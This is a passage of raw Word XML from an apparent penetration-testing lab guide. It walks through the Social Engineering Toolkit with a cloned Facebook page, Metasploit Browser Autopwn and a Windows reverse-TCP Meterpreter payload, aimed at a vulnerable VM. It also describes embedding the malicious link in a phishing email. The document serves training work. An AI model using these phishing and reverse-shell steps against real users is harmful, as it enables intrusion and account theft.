    <w:p w14:paraId="01DF2857" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B429B" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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As indicated below, my IP address is 192.168.1.105.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B41236" w14:textId="55D72C92" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Please record your IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34991E9E" w14:textId="346AD4BE" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CBC587B" wp14:editId="24C5DEEA">
            <wp:extent cx="5942965" cy="617474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190" cy="6183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A293F" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7B204D" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D92E279" w14:textId="3FDD09D7" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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D7332F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Section 4. Start the Social Engineering ToolKit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0841AF" w14:textId="14003F34" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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1.Start Social Engineering ToolKit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC936A" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4840363B" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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cd /pentest/exploits/set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626D3E69" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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./set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6885676F" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DCF646F" w14:textId="2527062B" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED9E6D3" wp14:editId="7C150EEF">
            <wp:extent cx="5943416" cy="6060440"/>
            <wp:effectExtent l="0" t="0" r="635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858" cy="6077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46892" w14:textId="21E336F4" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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2.Website Attack Vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C9469" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B376E8" w14:textId="3F866526" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Select 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BFE172" w14:textId="47215D0C" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9F445D" wp14:editId="3A961972">
            <wp:extent cx="5943216" cy="594614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377" cy="595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BD3AB" w14:textId="46BEC643" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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3.Select Metasploit Browser Attack Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17540EFB" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A2280" w14:textId="0ECF6E15" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Select 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC8DFBE" w14:textId="29035780" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="122BFB5A" wp14:editId="1CE54200">
            <wp:extent cx="5943314" cy="5374640"/>
            <wp:effectExtent l="0" t="0" r="635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78" cy="5381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D7851" w14:textId="7A9B4A96" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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4.Select Web Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D86A8" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE1188" w14:textId="59039C98" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Select 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32894565" w14:textId="7D5ADFBC" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6047AC04" wp14:editId="59597A0D">
            <wp:extent cx="5943430" cy="5374640"/>
            <wp:effectExtent l="0" t="0" r="63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431" cy="538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88499" w14:textId="3BBFB698" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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5.Set Facebook Web Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47139BF3" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C55750" w14:textId="5652A639" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Select 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CCAF8C" w14:textId="26DF90D9" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2618D512" wp14:editId="28424C47">
            <wp:extent cx="5943233" cy="5831840"/>
            <wp:effectExtent l="0" t="0" r="635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960" cy="58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964AD" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50ECECB9" w14:textId="71553948" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enter Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42532B" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57389C5D" w14:textId="077D69EC" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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24) Metasploit Browser Autopwn (USE AT OWN RISK!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8361FC" w14:textId="1E0806DA" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F8112AC" wp14:editId="1B8EDA80">
            <wp:extent cx="5943465" cy="5831840"/>
            <wp:effectExtent l="0" t="0" r="635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118" cy="5846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2AFC9" w14:textId="1BAA2B1A" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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7.Set Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E7BAC" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AB6488" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Select 2) Windows Reverse_TCP Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B399871" w14:textId="1A3C703A" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Use Port 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A44499A" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C88BE2" w14:textId="3F294C15" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="044C7575" wp14:editId="6CF4B2C9">
            <wp:extent cx="5943349" cy="5831840"/>
            <wp:effectExtent l="0" t="0" r="635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206" cy="5841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97A8B" w14:textId="7DD060DA" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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8.Exploits Prepared, Server Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEFBD6" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57703CAC" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Your are looking for the "--- Done, Found" before you Continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4030D969" w14:textId="07D47D1C" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Continue to next Section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20888D" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01235EB8" w14:textId="4C81B78C" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28288A9E" wp14:editId="7CD039C5">
            <wp:extent cx="5943465" cy="5603240"/>
            <wp:effectExtent l="0" t="0" r="635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152" cy="562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FC211" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0898F5EE" w14:textId="22C060E5" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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D7332F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Section 5. Start Up Windows Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30232F0B" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Social Engineering Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D08041" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Image how an attacker could embed the malicious link, created in previous Section, in an email to a possible victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D50D7C" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D734004" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Booting up WindowsVulerable01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B977F" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="940"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9FA5E5" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:hanging="216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Start up VMware Player</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC3C53" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:hanging="216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Select WindowsVulerable01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9318FE" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1660"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:hanging="216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Edit Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951F3A7" w14:textId="36EBD115" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="760FE2ED" wp14:editId="5B0B60D2">
            <wp:extent cx="5943207" cy="4231640"/>
            <wp:effectExtent l="0" t="0" r="635" b="10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618" cy="4236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371CD" w14:textId="78D8F8B2" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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2.Configuring the Network Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1A00F" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF65072" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Select Network Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78D597" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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Select Bridged Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872ABEE" w14:textId="38A6FA31" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Select OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9CF22" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771C1899" w14:textId="191B1CC3" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701C5B3B" wp14:editId="73D59831">
            <wp:extent cx="5943229" cy="480314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04" cy="4811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B700B" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4695DF" w14:textId="1EFBE7B3" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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3.Play WindowVulnerable01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F0772A" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A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color w:val="FB0007"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044D1C82" w14:textId="74182FFD" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr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Select Play virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF603C8" w14:textId="77777777" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3BD786" w14:textId="41DDDFE3" w:rsidR="009F0C0A" w:rsidRPr="00D7332F" w:rsidRDefault="009F0C0A" w:rsidP="009F0C0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7332F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
